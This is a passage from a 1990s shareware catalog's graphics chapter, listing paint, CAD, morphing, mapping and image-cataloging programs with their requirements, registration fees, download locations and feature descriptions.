CompuServe, mail + support; 3-month return policy; bonus utilities; all ASP-wide + offers (see page 6). + Look for: PCD2-*.ZIP on BBSs; PC-DRA.ARC on CompuServe in + CIS:IBMAPP forum LIBrary 10 (multiple files) (or contact userID + 70047,744 for assistance). + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + General purpose paint program. Includes graphics and text + screen capture & the PIX graphics language for animated + slideshows. Exports GEM .IMG format - perfect to include in + your word processor. Supports most Laser & dot-matrix printers. + Draw circles, lines, boxes, shaded rectangles, spray paint, + free-form drawing, edit fill patterns, and fonts; keyboard + macros; creates line and bar graphs; comes with clip-art + library. Makes bitmaps up to 1280x700 dots. + + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 113. + + Product: SUNDAY SCHOOL COLORS + A coloring game for children. See full description on + page 510. + + Product: SuperFlow + Windows based flowcharting & presentation. See full + description on page 554. + + Chapter 14, "Graphics" 558 + + + + 14.3.1 Graphics diversions + + Product: DAZZLE + Author: Worldwide MicroTronics, Inc., 713-298-1698 + Version: 5.1b (03-19-95) + Needs: IBM PC, DOS 3.1 or better. 350k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor. + Strongly recommended: VGA monitor; Hard disk; math coprocessor. + Registration fee: $15.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; DAZZLE.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 5 (or contact userID 76236,1573 for + assistance). + SWREG#: 150 + PsL#: 11205 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A 2D image engine for DOS and Windows as seen on CNN + FutureWatch. This non-TSR program has many images and menus. + Now the generally recognized defacto standard for self- + directing computer art. Config menu, help, integrated doc file, + fades. A version of this program was used to make the DAZZLE + Long Form Music Video from Miramar, now on VHS and video + LaserDisk. + + + Product: Frenetic Screensaver + Author: Seraline Pty Ltd, +61-2-879-4482 + Version: 3.3 (06-01-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor. + Strongly recommended: SVGA monitor. + Registration fee: $10.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 3 months of + unlimited fax, CompuServe, mail support; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: FRENET33.ZIP on BBSs. + SWREG#: 4667 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Endless colorful graphic abstractions are painted from a wealth + of drawing elements. Windows screensaver. Uses a 256 color + palette or 16-color VGA. + + Chapter 14, "Graphics" 559 + + + + Product: Hubble + Author: Hubble Software Company + Version: 2.21 (06-15-95) + Needs: IBM AT (80286), Windows 3.0 or better. 4096k RAM; Hard + disk; Mouse. + Registration fee: $37.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 3501 + Download size: 1156k (about 86 minutes with a 2400 baud modem) + Description: + Image editing, processing and manipulation. Add drawing, text, + etc. image patching, area fill. Process multiple images by + merge and stitch(+scaling). Interactive fine-tuning of + brightness, tone, color and contrast of image. Predefined and + custom design of filters, color conversion and dithering. + Document processing allows users to add and rearrange drawings, + text, etc. to document. Transform, scale, flip, and trim + images. Screen capture. Support TWAIN scanner. + + + Product: Image'n'Bits + Image enhancement program for Windows. See full description on + page 548. + + Product: JailBird + Author: RMH Computer Services, 317-782-9903 + Version: 2.11 (11-05-93) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $19.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6). + Look for: JBIRD211.ZIP on BBSs (call 317-784-2147 to download it + at no charge); JBIRD.ZIP on CompuServe in CIS:IBMNEW forum + LIBrary 5 (or contact userID 73567,1547 for assistance). + SWREG#: 1494 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + An entertaining mouse-driven program which lets the user create + and print replicas of "vanity" license plates. User can even + include personalized license plate "mounting bracket" around + the plate. WYSIWYG screen interface. Configurable on-screen + colors. Plates will include the state "slogan" at the bottom. + Will output to a wide variety of printers, even color printers. + Also output to PCX file. + + Chapter 14, "Graphics" 560 + + + + Product: Photo Show 3D + 3D Windows screen saver. See full description on page 78. + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 581. + + Product: Tangram + The anceint Chinesee jigsaw puzzle. See full description on + page 688. + + + 14.4 Presentation graphics + + See also: Business, Training & support aids, Lecturing & slide + shows. + + Product: BitMapZ For Windows + Author: Unicorn Software Limited, 816-429-3558 + Version: 2.30 (01-20-95) + Needs: IBM 80386, Windows 3.0 or better. 330k RAM; CGA monitor; + Dual 720k floppy drives; Mouse. + Registration fee: $14.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support; bonus graphics; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: BMPZW230.ZIP on BBSs (call 317-784-2147 to download it + at no charge); BMPZ4W.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 1715 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + Designed to help you create slide shows using BMPs. It gives + you the control over the slide's background colour, duration of + the slide, and lets you add a clear title to each slide, making + them easier to find. Now you can have your PC help with + presentations, relaxation, teaching or just give yourself a + visual break anytime you need it. The program is also useful + for displays, where you can have passers by examine your + product while you are away or busy. Easy to use and fun to + watch! + + + Product: Bubble Chart + Bubble Chart, animated graph. See full description on + page 338. + + Product: Chartist(tm) + Flowcharting and org charting. See full description on + page 551. + + Chapter 14, "Graphics" 561 + + + + Product: The Complete Morph + Full featured morphing facility for spec. F/X. See full + description on page 564. + + Product: Crowndale Tales : ESCAPE! [***] + Multimedia fable. See full description on page 689. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 552. + + Product: FF Graphics Conversion Utility + Convert metafiles and icons to bitmaps. See full description + on page 579. + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 412. + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 377. + + Product: SmartDraw [***] + Drag & drop flowcharting & draw for Windows. See full + description on page 571. + + Product: SuperFlow + Windows based flowcharting & presentation. See full + description on page 554. + + 14.4.1 Animation applications + + Product: The Complete Image + New image processor for big jobs/animations. See full + description on page 570. + + Product: Photo Show 3D + 3D Windows screen saver. See full description on page 78. + + Chapter 14, "Graphics" 562 + + + + Product: RTAG + Author: Phillip H. Sherrod, 615-292-2881 + Version: 2.1 (05-01-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support. + 3-month return policy. + Look for: RTAG20.ZIP on BBSs (call 415-323-4193 to download it at + no charge); RTAG.ZIP on CompuServe in CIS:GRAPHDEV forum + LIBrary 14 (or contact userID 76166,2640 for assistance). + Download size: 87k (about seven minutes with a 2400 baud modem) + Description: + Facilitates the generation of ray traced graphic animations. + This is not a ray tracing program; rather, it enables you to + generate the appropriate position of objects to produce an + animation using the ray tracing program of your choice. + Compiles a programming language designed for animation + generation and generates a set of files that can be used to + drive ray tracing programs such as POV-Ray, or other ray + tracers, to produce frame images. + + + Product: StarFlic + Author: TRIUS, Inc., 508-794-9377 + Version: 1.2 (04-14-94) + Needs: IBM PC, DOS 3.2 or better. 200k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + EMS memory. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; bonus utilities; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: SFLIC.EXE on BBSs; SFLIC.EXE on CompuServe in + CIS:IBMAPP forum LIBrary 10 (or contact userID 71333,103 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A flic file (FLI) compiler and player program. Create flic + files from True Vision TGA, or 16-color PCX image files. Play + FLI and basic FLC files compiled by other programs. User + specified anti-aliasing and image reduction using a 3x3 + Bartlett filter. Frame delay, gray scale color mapping, color + intensity averaging, VESA 256-color support, and more... + + Chapter 14, "Graphics" 563 + + + + 14.4.1.1 "Morphing" applications + + Product: The Complete Morph + Author: Hot Wax Software, 313-941-9223 + Version: 2.10 (02-26-94) + Needs: IBM 80386, DOS 3.3 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: SVGA monitor; math coprocessor. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities; bonus data; + bonus graphics; discounts on upgrades. Lifetime free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; CMORPH.ZIP on CompuServe + in CIS:GRAPHDEV forum LIBrary 13 (or contact userID 72163,2442 + for assistance). + SWREG#: 1629 + Download size: 476k (about 36 minutes with a 2400 baud modem) + Description: + Very user-friendly morphing facility. Advanced mesh editing + allows easy mesh creation, and includes a 'live' zoom-window + for pixel-perfect mesh points. 3 different spline types for + various morphing effects. Breaks the 640K barrier with built- + in virtual memory. Runs in 32-bit protected mode for more + speed and memory. Includes Overlays, backgrounds, over 100 + user definable image processing filters built in. Speed mode + and high-quality modes. Plenty of other options and user + settings. + + + 14.5 CAD/CAM applications + + See also: Engineering; Graphics, Software tools & add-ins, For + AutoCAD. + + Product: DRAFT CHOICE + Author: TRIUS, Inc., 508-794-9377 + Version: 2.00e (01-06-94) + Needs: IBM PC, DOS 3.2 or better. 412k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; HP LaserJet printer; + Epson printer. + Strongly recommended: EGA monitor; Hard disk; Plotter; XMS + memory; math coprocessor. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + + Chapter 14, "Graphics" 564 + + + + return policy; bonus utilities; bonus fonts; discounts on other + products; discounts on upgrades. Bonus symbol libraries. + Look for: DC20E.ZIP on BBSs (call 617-354-2505 to download it at + no charge); DC.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 10 + (or contact userID 71333,103 for assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Awards & nominations: 1993 winner, Shareware Industry Awards. + Description: + Vector based, affordable CAD program with over 200 drawing, + viewing and editing commands. Mouse and keyboard operation. + 9-pin, 24-pin, HP LaserJet/DeskJet, PostScript and HP plotter + support. Auto-dimensioning, 256 layers, English and metric + units, auto-scaling, powerful floating point zoom, symbol + library support, animation, on-line calculator, parametric + function generator, EMS and virtual memory support, 3-D type + volume rendering, parallel, vertical, tangent modes, and much + more... + + + Product: GammaCAD + Author: Gamma Software, 303-490-2928 + Version: 1.10 (02-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $15.00 (add $6.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, GEnie, mail support. + 2-month return policy. 2-month free upgrading allowed. + Look for: GCAD110.ZIP on BBSs; GCAD.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 73737,1721 for + assistance); GCAD110.ZIP on GEnie in WINDOWS forum LIBrary 6 + (or contact userID T.EMMER for assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + This CAD program allows you to create drawings of real world + objects, in two dimensions, using their actual measurements. + They can then be plotted at any scale on any Windows supported + printer or plotter. Drawing elements include: lines, arcs, + circles, points and text. Line types (dashed, dotted, etc.), + line color and line width can be specified. Also gives you + full text font control. Edit features include: copy, delete, + scale and rotate. Zoom, pan, element snaps, help and more. + + Chapter 14, "Graphics" 565 + + + + Product: Home Plan + Author: Home Plan, 209-754-4891 + Version: 2.7 (11-01-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of phone, + CompuServe, GEnie, mail support; bonus utilities; discounts on + other products. + Look for: HOME27.ZIP on BBSs; HOME27.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 10 (or contact userID 71321,167 for + assistance); HOME27.EXE on GEnie in IBMPC forum LIBrary 15 (or + contact userID C.HERNDON for assistance). + SWREG#: 388 + Download size: 134k (about ten minutes with a 2400 baud modem) + Description: + Draw, save & print house plans. Easy to learn & use. + * Move, copy, resize, mirror + * Undo, redo, clone + * Automatic dimensioning, supports metric + * Optionally shows framing (studs/joists/etc.) + * Rectangles, circles, Arcs, etc. + * Delete screen areas + * Selectable line styles + * On-screen odometers, protractor + * Automatic door insertion + * Variable width walls + * Print screen size or 1/8" per ft scale + * Insert pre-drawn furniture/appliances + * Sq ft calculation + + + Product: Layout + Office layout and equipment inventory. See full description on + page 337. + + Chapter 14, "Graphics" 566 + + + + Product: PC-Draft-CAD + Author: Natural Software, 708-377-7320 + Version: 3.06g (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 384k RAM; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $65.00 (Canadian dollars) (add $91.00 (Canadian + dollars) for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities; all ASP-wide + offers (see page 6); disks of other shareware. + Look for: PCDCAD*.ZIP on BBSs (multiple files); PCCAD*.EX on + CompuServe in CIS:IBMAPP forum LIBrary 10 (multiple files) (or + contact userID 70047,744 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A full featured CAD system with features found in expensive + commercial CAD systems. Automatic dimensions, unlimited layers, + named objects in group libraries, context sensitive help, print + on plotters, dot-matrix, lasers. Exact scale output in feet- + inches, metric, decimal feet or inches. Keyboard macros. Import + WordPerfect .WPG, .DXF; export .WPG, .GEM, ASCII or HPGL + formats. Includes fonts, sample drawings, symbol libraries. + spline curves, area calc. Virtual memory. + + + Product: PrintGF + Image printer. See full description on page 88. + + Product: PrintGL + Pen plotter emulator package. See full description on page 88. + + Chapter 14, "Graphics" 567 + + + + Product: ProtoCAD 3D + Author: TRIUS, Inc., 508-794-9377 + Version: 2.00 (04-23-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; EGA monitor; Dual + 720k floppy drives; HP LaserJet printer; Mouse; Plotter; Epson + printer; EMS memory. + Strongly recommended: Hard disk. + Registration fee: $59.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; + discounts on other products; discounts on upgrades. + Look for: PC3D20.ZIP on BBSs; PCAD3D.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 10 (or contact userID 71333,103 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Awards & nominations: 1993 finalist, Shareware Industry Awards. + Description: + Powerful 3-Dimensional CAD/rendering program. Windows-like, on + screen toolbar; dynamic trackball viewpoint rotation; + perspective, isometric, and plane views; realistic light source + and surface shading; user defined color mixing; 32 layers; 3D + drawing tools (cone, block, mesh, prism...); powerful extrude, + revolve, sweep, skin and patch 3D commands, full compliment of + editing commands (Copy, Move, Scale...); TGA, POV, PCX output; + VESA support; more... + + + Product: TommySoftware CAD/Draw + Powerful CAD and drawing program for Windows. See full + description on page 554. + + 14.5.1 Vector/ray tracing + + Product: REALIZE + Author: Transcendental Technologies + Version: 1.0 (09-21-94) + Needs: IBM PC, DOS 5.0 or better. VGA monitor; Hard disk. POV + 2.0 or later (freeware raytracer). + Strongly recommended: AutoCad or other .DXF file generator. + Registration fee: $50.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + mail support; bonus utilities; bonus data; bonus graphics; all + ASP-wide offers (see page 6). + Look for: REALIZE.ZIP on BBSs. + Download size: 272k (about 20 minutes with a 2400 baud modem) + Description: + A full-featured, one-step .DXF-to-POV raytracer description + file format converter. It converts all 3D entities and extruded + 2D entities to a ready-to-trace package. Fully converts simple + and nested blocks as well as the 256 standard colors. Full + control of smoothing, texturing, etc. is implemented via a + + Chapter 14, "Graphics" 568 + + + + "directive file". Other features: automatic generation of + floors,skies,and lighting; infinitely smooth shapes; bit maps; + CSG; 2D effects; others. + + + Product: RTAG + Ray tracing animation generator. See full description on + page 561. + + + 14.6 Business applications + + See also: Business. + + Product: The Complete Image + Author: Hot Wax Software, 313-941-9223 + Version: 3.11 (07-01-93) + Needs: IBM 80386, DOS 3.3 or better. 2000k RAM; VGA monitor; + Hard disk. + Strongly recommended: math coprocessor. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; 3-month return policy; discounts on upgrades. 3-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; CIMAGE.ZIP on CompuServe + in CIS:GRAPHDEV forum LIBrary 6 (or contact userID 72163,2442 + for assistance). + Download size: 347k (about 26 minutes with a 2400 baud modem) + Description: + A new concept in image processing. Its batch abilities + combined with macros make it a powerful tool for large + amination projects. Command line interface offers much more + flexibility than most other interfaces. Features include: + read/write/merge/convert TGA/IMG/BMP/GIF and IPI; complete + 24-bit VESA support (1.2 VBE); online help; macros; over 100 + filters built in; uses all memory plus VMM; gamma corr. & + contrast enh.; blue screen effects; much much more! + + Chapter 14, "Graphics" 569 + + + + Product: EXPRESSGRAPH + Author: Expressware Corporation, 206-788-0932 + Version: 1.05 (05-01-92) + Needs: IBM PC, DOS 2.0 or better. 320k RAM; CGA monitor; Epson + printer. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: EGRAF1.ZIP on BBSs (call 206-788-4008 to download it at + no charge); EGRAF1.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 10 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + The size of the graph can be adjusted by changing the height + and width. Horizontal and vertical grids can easily be turned + on or off. The scaling factor can be controlled. Graph up to + 16 groups of 52 numbers each using 16 different fill patterns. + Line graphs can be made with or without symbols. Bar charts + can be regular, overlapped, stacked, percentage or three + dimensional. Pie charts can be uncut, exploded or separated. + Import data from other programs. + + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 412. + + Product: LABELS-PLUS Labeling System + Bar code label print system. See full description on page 94. + + Chapter 14, "Graphics" 570 + + + + Product: SmartDraw [***] + Author: SmartDraw Software Inc., 619-549-0314 + Version: 2.01 (08-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, mail support; bonus + graphics; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: SMRTDRW.ZIP on BBSs (call 617-354-8873 to download it + at no charge); SMRTDR.ZIP on CompuServe in WIN:PROD forum + LIBrary 15 (or contact userID 75334,3714 for assistance). + SWREG#: 4133 + Download size: 475k (about 35 minutes with a 2400 baud modem) + Description: + Easy-to-use program for Windows that lets anyone draw great + looking diagrams, flowcharts, flyers, maps, and other business + graphics. Better value and easier to use than Visio, more + powerful than SnapGrafx, it provides drag & drop drawing, + automatic connecting lines between shapes, built-in design + styles and shape libraries. Works with Microsoft Office and + other programs as an OLE Server. You don't have to be an artist + to get professional results when you use this. Winner Best + Graphics Program, 1995. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 355. + + 14.6.1 OCR applications + + Product: WinOCR + Author: SoftTech, 071-359-0405 + Version: 2.0b (09-20-93) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; VGA + monitor; Hard disk. + Registration fee: $30.00 + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); lifetime unlimited CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: WINOCR.ZIP on BBSs; WINOCR.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 0 (or contact userID 100116,3254 for + assistance). + Download size: 225k (about 17 minutes with a 2400 baud modem) + Description: + An Optical Character Recognition program. It works with bitmaps + produced using low cost hand-held scanners and is intended to + provide an effective method of data entry for programmers and + others who require OCR. + + Chapter 14, "Graphics" 571 + + + + 14.6.2 Mapping/cartography + + See also: Data, Mapping data; Engineering, Surveying & + cartography. + + Product: Landscape Explorer + Author: WoolleySoft, 0786-825406 + Version: 3.01 (01-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $65.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of phone, CompuServe, mail support; bonus utilities; + bonus data; bonus templates; all ASP-wide offers (see page 6); + discounts on upgrades. + Look for: availability unknown on BBSs; LAND*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 100332,2104 + for assistance). + SWREG#: 2099 + PsL#: 11239 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A 3D landscape viewer/GIS application for Windows. Can import + data from digital files or scanned map images to create 3D + models of landscape surfaces. These can be viewed from any + position and drawn in many different schemes such as Summer and + Winter colours, GIS data mapping and wire frame. Supports USGS + DEM 7.5' and UK OS NTF LandRanger file formats. + + + Product: MAPIT + Author: Allison Software, 412-727-2198 + Version: 1.4 (04-15-94) + Needs: IBM AT (80286), DOS 3.3 or better. 512k RAM; EGA monitor; + Hard disk; Mouse; EMS memory. + Strongly recommended: VGA monitor; HP LaserJet printer; + Plotter; XMS memory; math coprocessor. + Registration fee: $39.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, CompuServe, mail support; royalty-free runtime + license; + Look for: MAPIT14*.* on BBSs (multiple files); MAPIT*.* on + CompuServe in CIS:IBMAPP forum LIBrary 7 (multiple files) (or + contact userID 72600,1200 for assistance). + Download size: 912k (about 68 minutes with a 2400 baud modem) + Description: + An integrated world mapping system of amazing detail which lets + you create customized maps for work, shool, or fun. + * print detailed, professional-quality customized maps + * merge maps with word processing documents + * record and plot GPS data + * add your own detail with 100 foot precission + + Chapter 14, "Graphics" 572 + + + + * measure distances, calculate azimuth angles, and plot + great circles and range curves with areas + * see the day and time anywhere in the world + * zoom to any level of detail + + + Product: VERSAMAP + Author: Charles H. Culberson, 302-731-0694 + Version: 1.40 (06-14-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $15.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; bonus fonts. + Look for: VMAP140.ZIP on BBSs (call 916-327-1208 to download it + at no charge); VMAP14.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70511,3134 for assistance). + Download size: 321k (about 24 minutes with a 2400 baud modem) + Description: + Draw outline maps on 13 map projections. Print maps on + printer; or as PCX, PIC, CGM, ASCII files. Add text to maps. + Contains new countries formed from USSR, Australian States, + Canadian Provinces. Plot World Data Bank II and USGS Digital + LIne Graph data. Plot Great Circles, report course and + distance at waypoints along Great Circle, plot maps in 16 + colors, select background and grid colors. + + + 14.7 Ready-made graphic images + + See also: Data, Mapping data. + + 14.7.1 Multi-format images + + Product: PixFolio Image Catalog System + Windows image catalog utility. See full description on + page 576. + + Chapter 14, "Graphics" 573 + + + + 14.7.2 BMP images + + Product: Kid's Art [***] + Author: R.K. West Consulting + Version: 1.1 (09-20-94) + Needs: IBM PC, DOS 2.11 or better. Ability to display or print + BMP images. + Strongly recommended: VGA monitor. + Registration fee: $0.00 + Registration benefits: + Look for: KDSART11.ZIP on BBSs; KDSART.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Twenty children's drawings converted to graphics files. BMP + format (16-color bitmapped) suitable for WIndows wallpaper and + other BMP uses. Not great art, but childlike, could be fun. + Best in color. + + + 14.7.3 PCX images + + Product: Kid's Art [***] + Children's artwork. See full description on page 573. + + 14.7.4 WPG images + + Product: Graphcat/DOS Clip Art Cataloger + Clip art cataloger for WordPerfect 6.0/5.1. See full + description on page 264. + + Product: Graphcat/Win Clip Art Cataloger + Graphcat clip art cataloger for WPWin61/52. See full + description on page 265. + + 14.7.5 Other formats + + Product: Crowndale Tales : ESCAPE! [***] + Multimedia fable. See full description on page 689. + + Product: RISS Icon Pak + RISS Icon Pak: 2001 Icons, plus Icon Viewer! See full + description on page 550. + + + 14.8 Utilities + + Product: Grafer Line Graphs for Reports + Makes line graphs for reports. See full description on + page 412. + + Chapter 14, "Graphics" 574 + + + + Product: QFont + Font editor for HP LaserJet soft fonts. See full description + on page 113. + + Product: RISS Icon Pak + RISS Icon Pak: 2001 Icons, plus Icon Viewer! See full + description on page 550. + + Product: RTAG + Ray tracing animation generator. See full description on + page 561. + + 14.8.1 Cataloging tools + + See also: Utilities, File utilities, File sorting & conversion. + + Product: 4EDIT + File description editor for 4DOS. See full description on + page 217. + + Product: Graphcat/DOS Clip Art Cataloger + Clip art cataloger for WordPerfect 6.0/5.1. See full + description on page 264. + + Product: Graphcat/Win Clip Art Cataloger + Graphcat clip art cataloger for WPWin61/52. See full + description on page 265. + + Product: Jasc Media Center [***] + Author: JASC, Inc., 612-930-9171 + Version: 2.02 (07-13-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk. + Strongly recommended: Mouse; sound card. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $16.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; bonus graphics; discounts on upgrades. + Look for: MC202.ZIP on BBSs (call 612-930-3516 to download it at + no charge); MC.ZIP on CompuServe in CIS:JASC forum LIBrary 19 + (or contact userID 74774,570 for assistance). + SWREG#: 4493 + Download size: 875k (about 65 minutes with a 2400 baud modem) + Description: + A Windows program for multimedia file management and + manipulation. Organize your multimedia files into albums of + thumbnails. Catalog, search, sort by keyword, comment, or file + properties. View files using the powerful slide show feature. + Full file manipulation capabilities from within the program. + Print high quality contact sheets. Support for over 35 file + formats, removable disks, and CD Roms. Winner 1995 ZiffNet + Awards. + + Chapter 14, "Graphics" 575 + + + + Product: PixFolio Image Catalog System + Author: ACK Software, 502-955-7527 + Version: 2.0.83 (07-03-93) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; VGA + monitor; Mouse. + Strongly recommended: SVGA monitor. HICOLOR adapter for 24-bit + images. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: PIXF20.ZIP on BBSs; PIXF20.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 71220,23 for + assistance). + Download size: 500k (about 37 minutes with a 2400 baud modem) + 